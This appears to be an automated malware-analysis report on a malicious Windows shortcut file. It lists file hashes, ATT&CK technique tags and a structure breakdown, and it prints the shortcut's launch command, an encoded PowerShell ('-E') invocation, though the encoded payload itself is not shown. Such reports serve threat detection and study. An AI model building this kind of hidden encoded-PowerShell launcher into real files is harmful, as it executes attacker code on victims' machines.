Malicious

0906e26681d7866715a52648581d03bd

LNK File | MD5: 0906e26681d7866715a52648581d03bd | Size: 2.38 KB | application/x-ms-shortcut

Tags: LNK, Malicious, LOLBin, LOLBin:powershell.exe, Execution: CMD in LNK, T1059.003, T1202: Indirect Command Execution, T1204.002, Execution: PowerShell in LNK, T1059.001, PowerShell, Batch Command, PowerShell Call, DeObfuscated

Characteristics
MD5: 0906e26681d7866715a52648581d03bd
Sha1: c2f5371932deca1e5b939f8dba109884da2c7131
Sha256: de36a43adddc063311313a12aa800d63af9df0e5e7379c1a2b16aee92d4e5c66
Sha384: 983f349d2c21295838eaca64ab379c21f141faef9fc3b0d2e8413b89577d64e1e06cc031c85ac81baef71e70add8279b
Sha512: 146a72d44cd3c1f26cdf5cf2499703c6d59e414032bbaafabdaf882bda4d05f7585bbe4b10c9126f5f99db9854b01d58b11d8f679016619db881e25948fd42f3
SSDeep: 48:8r5aqzfSwuolMol3a/aklkQVh6FtmA4a:8r5vPa/vKQVMeA4
TLSH: 1841642809F611FEF93787B99BF873F34562F7E28C285ABC108067424366050B4A3E79
File Structure
0906e26681d7866715a52648581d03bd
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
Value
LNK: Command Execution

powershell.exe powershell -E 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

Deobfuscated PowerShell

-e "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"
